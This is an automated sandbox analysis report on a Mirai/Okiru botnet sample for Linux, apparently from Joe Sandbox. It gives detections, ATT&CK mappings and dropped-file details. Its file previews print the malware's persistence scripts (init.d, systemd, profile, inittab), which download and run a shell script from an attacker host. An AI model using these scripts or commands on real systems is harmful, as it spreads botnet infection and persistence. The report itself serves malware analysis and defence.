      Source: Yara matchFile source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6211, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6289, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6290, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6291, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6292, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6310, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6311, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6346, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6347, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6351, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6352, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Okiru
      Source: Yara matchFile source: x86_64.nn.elf, type: SAMPLE
      Source: Yara matchFile source: 6211.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6290.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6289.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6352.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6310.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6351.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6311.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6292.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6291.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6346.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 6347.1.0000000000400000.0000000000413000.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6211, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6289, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6290, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6291, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6292, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6310, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6311, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6346, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6347, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6351, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: x86_64.nn.elf PID: 6352, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information2
      Scripting      		Valid AccountsWindows Management Instrumentation1
      Unix Shell Configuration Modification      		1
      Unix Shell Configuration Modification      		1
      Masquerading      		OS Credential Dumping1
      Virtualization/Sandbox Evasion      		Remote ServicesData from Local SystemData ObfuscationExfiltration Over Other Network Medium1
      Data Manipulation
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Systemd Service      		1
      Systemd Service      		1
      Virtualization/Sandbox Evasion      		LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over Bluetooth1
      Service Stop
      Email AddressesDNS ServerDomain AccountsAt2
      Scripting      		Logon Script (Windows)2
      File and Directory Permissions Modification      		Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact

      Malware Configuration

      No configs have been found

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Number of created Files
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1520518 Sample: x86_64.nn.elf Startdate: 27/09/2024 Architecture: LINUX Score: 92 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus / Scanner detection for submitted sample 2->74 76 Multi AV Scanner detection for submitted file 2->76 78 Yara detected Okiru 2->78 8 x86_64.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 systemd snapd-env-generator 2->14         started        process3 file4 62 /etc/rc.local, POSIX 8->62 dropped 64 /etc/profile, ASCII 8->64 dropped 66 /etc/init.d/mybinary, POSIX 8->66 dropped 84 Sample tries to set files in /etc globally writable 8->84 86 Sample tries to persist itself using /etc/profile 8->86 88 Drops files in suspicious directories 8->88 90 Sample tries to persist itself using System V runlevels 8->90 16 x86_64.nn.elf 8->16         started        18 x86_64.nn.elf sh 8->18         started        20 x86_64.nn.elf sh 8->20         started        22 6 other processes 8->22 signatures5 process6 file7 26 x86_64.nn.elf 16->26         started        28 x86_64.nn.elf 16->28         started        30 x86_64.nn.elf 16->30         started        41 4 other processes 16->41 32 sh chmod 18->32         started        35 sh ln 20->35         started        60 /etc/init.d/x86_64.nn.elf, POSIX 22->60 dropped 80 Sample tries to kill multiple processes (SIGKILL) 22->80 82 Drops files in suspicious directories 22->82 37 sh chmod 22->37         started        39 sh ln 22->39         started        43 2 other processes 22->43 signatures8 process9 signatures10 45 x86_64.nn.elf 26->45         started        48 x86_64.nn.elf 28->48         started        50 x86_64.nn.elf 30->50         started        68 Sample tries to set files in /etc globally writable 32->68 70 Sample tries to persist itself using System V runlevels 35->70 52 x86_64.nn.elf 41->52         started        54 x86_64.nn.elf 41->54         started        56 x86_64.nn.elf 41->56         started        58 x86_64.nn.elf 41->58         started        process11 signatures12 92 Sample tries to kill multiple processes (SIGKILL) 45->92

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      x86_64.nn.elf37%ReversingLabsLinux.Backdoor.Mirai
      x86_64.nn.elf100%AviraEXP/ELF.Mirai.W

      Dropped Files

      SourceDetectionScannerLabelLink
      /etc/rc.local0%ReversingLabs

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://pen.gorillafirewall.su/lol.shx86_64.nn.elf, 6211.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmpfalse
        		unknown
        http://pen.gorillafirewall.su/x86_64.nn.elf, 6352.1.00007ffd4fb07000.00007ffd4fb28000.rw-.sdmp, profile.12.dr, inittab.12.dr, x86_64.nn.elf.34.dr, bootcmd.12.dr, mybinary.12.dr, custom.service.12.drfalse
          		unknown

          World Map of Contacted IPs

          No contacted IP infos

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          /etc/init.d/x86_64.nn.elfx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
            /etc/init.d/mybinaryx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
              /etc/rc.localx86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                fAeSHbjY6q.elfGet hashmaliciousMirai, OkiruBrowse
                  xi12G4nDgf.elfGet hashmaliciousMirai, OkiruBrowse
                    cieweWkUr2.elfGet hashmaliciousMirai, OkiruBrowse
                      vCM6VboRal.elfGet hashmaliciousMirai, OkiruBrowse
                        tVdq8lEt3e.elfGet hashmaliciousMirai, OkiruBrowse
                          GTWXkCrjA1.elfGet hashmaliciousMirai, OkiruBrowse
                            jMMTZcFBa8.elfGet hashmaliciousMirai, OkiruBrowse
                              7MxrefODr5.elfGet hashmaliciousMirai, OkiruBrowse
                                pO9NAGXywW.elfGet hashmaliciousMirai, OkiruBrowse

                                  Created / dropped Files

                                  /boot/bootcmd

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):130
                                  Entropy (8bit):4.6557897642432335
                                  Encrypted:false
                                  SSDEEP:3:KPJRXfVNFDDoCQALjWQegRILbaaFOdFXa5O:WJRtXforwFCbaaeXCO
                                  MD5:C43AF51A730177D5BE97893495E9C56E
                                  SHA1:2CF3CE48EBCD44E8F40BAE4EC9AF2F38EFEAE253
                                  SHA-256:F87A5DFC4CBB84E295E6239D2207A21B53681EE9CA225DC3CE54F8D23BE6D86A
                                  SHA-512:E18AAA3206F4780DA8DBCC7E848FCF0D918A895F4F9B89EBED36DEC82586B90DFA17E465F958C0B46A99B524CC6504E8F14429E69798A2A972F3BC1A96D62840
                                  Malicious:false
                                  Reputation:low
                                  Preview:run bootcmd_mmc0; /tmp/x86_64.nn.elf && wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

                                  /etc/init.d/mybinary

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:POSIX shell script, ASCII text executable
                                  Category:dropped
                                  Size (bytes):117
                                  Entropy (8bit):4.653895344261878
                                  Encrypted:false
                                  SSDEEP:3:TKH4vZKfVNFDvSDRFbALjWQegRILpaKB0dFLoKE0:h8tXzSXbwFCzBeLXE0
                                  MD5:FC98AE985142E9D860067130B0A6C0BA
                                  SHA1:A74297F4B49100CFD2118F7DD7BBC7C7EAF5C343
                                  SHA-256:F8827A346B4040C954E21EBAFB0E39F74DEE1B60348F367745C9251A726D46C3
                                  SHA-512:217D795AA84763FB7E53F3BDB4A2A78C93C62EEC8DF1B575EAB10EA0D7AE988BBE2710F3E9E30A87F4A498B22AD8628B637524648359F81F54C9EE75CD77EAC1
                                  Malicious:true
                                  Joe Sandbox View:
                                  • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                  Reputation:low
                                  Preview:#!/bin/sh./tmp/x86_64.nn.elf &.wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

                                  /etc/init.d/x86_64.nn.elf

                                  Download File
                                  Process:/bin/sh
                                  File Type:POSIX shell script, ASCII text executable
                                  Category:dropped
                                  Size (bytes):418
                                  Entropy (8bit):4.607619458388583
                                  Encrypted:false
                                  SSDEEP:12:QRkhTXNxfgUJgjvMYFPuKN+dRRucSOyd3:VIbSYOM3
                                  MD5:B88D577D8BA64636EAA4B85146D2BCE4
                                  SHA1:715B18797C8EEC1FB4BFF960DB9145AC4584944E
                                  SHA-256:1FDAED3926CA03F6E2973914FC45A40CF93E7EB57AACBD07AD2172374C28DDD2
                                  SHA-512:683546A08FD6CCE4FCBD8F1E3F2CDB7B8196F9003368D1A6222EBF4C0FAD05B05F092EB103F0DB7D20DADFC4D5D3D470AAF5205430639E3669CE94BA9040E715
                                  Malicious:true
                                  Joe Sandbox View:
                                  • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                  Reputation:low
                                  Preview:#!/bin/sh.# /etc/init.d/x86_64.nn.elf..case "" in. start). echo 'Starting x86_64.nn.elf'. /tmp/x86_64.nn.elf &. wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping x86_64.nn.elf'. killall x86_64.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.

                                  /etc/inittab

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):122
                                  Entropy (8bit):4.57878375837238
                                  Encrypted:false
                                  SSDEEP:3:nAWu5JVNFDDoCQALjWQegRILbaaFOdFXa5O:AlXforwFCbaaeXCO
                                  MD5:691DFDB2AE36E857ECF95A9826EE84FF
                                  SHA1:41FCC9910C2F8C23CF13713C05879737390182CB
                                  SHA-256:7638F6E1EE0FA5C5AC4040045B60961BED3F6FA643DD3178DF1FF2FD73195C24
                                  SHA-512:101EF67984CFA98469E6BD5372B38CBE5070BF800DCF3F6F65C418A60E217C7086C4D491F7629457CC694AA6B7050F38F40BF0877597D60E659E035AEE938225
                                  Malicious:false
                                  Reputation:low
                                  Preview:::respawn:/tmp/x86_64.nn.elf && wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

                                  /etc/motd

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):53
                                  Entropy (8bit):3.871459242626451
                                  Encrypted:false
                                  SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                  MD5:2BD9B4BE30579E633FC0191AA93DF486
                                  SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                  SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                  SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:gorilla botnet is on the device ur not a cat go away.

                                  /etc/profile

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):113
                                  Entropy (8bit):4.53639514597302
                                  Encrypted:false
                                  SSDEEP:3:TgfVNFDvSDRFbALjWQegRILbaaFOdFXa50:TgtXzSXbwFCbaaeXC0
                                  MD5:5105559F960624F72CA3C99DFD37B750
                                  SHA1:7B7A35F2D35C08A5BB3BD28254903717C947DFED
                                  SHA-256:0F0FDA85F400F63860D87D093089C9A10B15AAA0BF607B38D1C7388CA7F4DA0B
                                  SHA-512:BF42ABB735751A9C5C780B675A7301DFCAEE5AA2B99B0B3AD2FD00EAFD5C4A9027AA7251E830E89ADED58E62609EF8406C3B724F0474F28E25C519DF0BAF3345
                                  Malicious:true
                                  Preview:/tmp/x86_64.nn.elf &.wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

                                  /etc/rc.local

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:POSIX shell script, ASCII text executable
                                  Category:dropped
                                  Size (bytes):10
                                  Entropy (8bit):3.121928094887362
                                  Encrypted:false
                                  SSDEEP:3:TKH4vn:hv
                                  MD5:3E2B31C72181B87149FF995E7202C0E3
                                  SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                  SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                  SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Joe Sandbox View:
                                  • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                  • Filename: fAeSHbjY6q.elf, Detection: malicious, Browse
                                  • Filename: xi12G4nDgf.elf, Detection: malicious, Browse
                                  • Filename: cieweWkUr2.elf, Detection: malicious, Browse
                                  • Filename: vCM6VboRal.elf, Detection: malicious, Browse
                                  • Filename: tVdq8lEt3e.elf, Detection: malicious, Browse
                                  • Filename: GTWXkCrjA1.elf, Detection: malicious, Browse
                                  • Filename: jMMTZcFBa8.elf, Detection: malicious, Browse
                                  • Filename: 7MxrefODr5.elf, Detection: malicious, Browse
                                  • Filename: pO9NAGXywW.elf, Detection: malicious, Browse
                                  Preview:#!/bin/sh.

                                  /etc/systemd/system/custom.service

                                  Download File
                                  Process:/tmp/x86_64.nn.elf
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):311
                                  Entropy (8bit):4.972041660197135
                                  Encrypted:false
                                  SSDEEP:6:z8ifitRZAMzdK+5902+GWRd4wm+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+jp+GWRddm+GWRXY+GWRuL6
                                  MD5:7EAD9B688BCB031A399760E2DF6B684C
                                  SHA1:363C6C4AC23B0F0EC2ABD8C62F25BF6DBD170726
                                  SHA-256:0454F305C7C20E99329EB961C1E232D84111056A9F6A176508176076A5DAB6D2
                                  SHA-512:A63973B96C25F50632DBB9CA5365CBD7B425081FC27421E72946CA3C303121927C843B06900F1D64027E62313DBE86E9876B777EFD51BAF6228239E2DE73B456
                                  Malicious:false
                                  Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/x86_64.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://pen.gorillafirewall.su/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

                                  /memfd:snapd-env-generator (deleted)

                                  Download File
                                  Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                  File Type:ASCII text
                                  Category:dropped
                                  Size (bytes):76
                                  Entropy (8bit):3.7627880354948586
                                  Encrypted:false
                                  SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                  MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                  SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                  SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                  SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                  Malicious:false
                                  Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

                                  Static File Info

                                  General

                                  File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
                                  Entropy (8bit):6.170090518797771
                                  TrID:
                                  • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                  File name:x86_64.nn.elf
                                  File size:80'256 bytes
                                  MD5:a43c7b0fb823947daaebc84fc7f18d51
                                  SHA1:c95a119ea56a0c2b107c7ef47e852ee74e8ac891
                                  SHA256:0671ab8eb145cea8e6b613b958a817e12d512a24ea1b5a3a2091a3b556c2a900
                                  SHA512:98f518415d6d8ba4670ca4ecdca9ab8d602a881de9a5f450121f6c6dbad87ee8321d4e13538cb8ec8440cdad8acee906ce5e157f2be1478ec340a98c04337099
                                  SSDEEP:1536:TETBpHwYwiiTKEZ3D1VLc43UMIIVD2rky1m2S1UX67R7lVC9M:EvHJtiTTZT15c4uWD2j1m2Smq7R7lVIM
                                  TLSH:13732A037580C0FCC499C278572B723AD937B07E2139B2A627E9FF266F89E605E1E554
                                  File Content Preview:.ELF..............>.......@.....@...................@.8...........................@.......@......&.......&.......................0.......0Q......0Q.............h/..............Q.td....................................................H...._....Z...H........

                                  Static ELF Info

                                  ELF header

                                  Class:ELF64
                                  Data:2's complement, little endian
                                  Version:1 (current)
                                  Machine:Advanced Micro Devices X86-64
                                  Version Number:0x1
                                  Type:EXEC (Executable file)
                                  OS/ABI:UNIX - System V
                                  ABI Version:0
                                  Entry Point Address:0x400194
                                  Flags:0x0
                                  ELF Header Size:64
                                  Program Header Offset:64
                                  Program Header Size:56
                                  Number of Program Headers:3
                                  Section Header Offset:0
                                  Section Header Size:0
                                  Number of Section Headers:0
                                  Header String Table Index:0

                                  Program Segments

                                  TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                  LOAD0x00x4000000x4000000x126100x126106.37180x5R E0x100000
                                  LOAD0x130000x5130000x5130000x6c00x2f682.67530x6RW 0x100000
                                  GNU_STACK0x00x00x00x00x00.00000x6RW 0x8

                                  Network Behavior

                                  Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                  System Behavior

                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:/tmp/x86_64.nn.elf
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "systemctl enable custom.service >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:54
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/systemctl
                                  Arguments:systemctl enable custom.service
                                  File size:996584 bytes
                                  MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/chmod
                                  Arguments:chmod +x /etc/init.d/mybinary
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/ln
                                  Arguments:ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
                                  File size:76160 bytes
                                  MD5 hash:e933cf05571f62c0157d4e2dfcaea282

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "echo \"#!/bin/sh\n# /etc/init.d/x86_64.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting x86_64.nn.elf'\n /tmp/x86_64.nn.elf &\n wget http://pen.gorillafirewall.su/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping x86_64.nn.elf'\n killall x86_64.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/x86_64.nn.elf"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "chmod +x /etc/init.d/x86_64.nn.elf >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/chmod
                                  Arguments:chmod +x /etc/init.d/x86_64.nn.elf
                                  File size:63864 bytes
                                  MD5 hash:739483b900c045ae1374d6f53a86a279

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/mkdir
                                  Arguments:mkdir -p /etc/rc.d
                                  File size:88408 bytes
                                  MD5 hash:088c9d1df5a28ed16c726eca15964cb7

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/tmp/x86_64.nn.elf
                                  Arguments:-
                                  File size:80256 bytes
                                  MD5 hash:a43c7b0fb823947daaebc84fc7f18d51

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:sh -c "ln -s /etc/init.d/x86_64.nn.elf /etc/rc.d/S99x86_64.nn.elf >/dev/null 2>&1"
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/bin/sh
                                  Arguments:-
                                  File size:129816 bytes
                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                  Chronological Activities


                                  General

                                  Start time (UTC):10:53:55
                                  Start date (UTC):27/09/2024
                                  Path:/usr/bin/ln
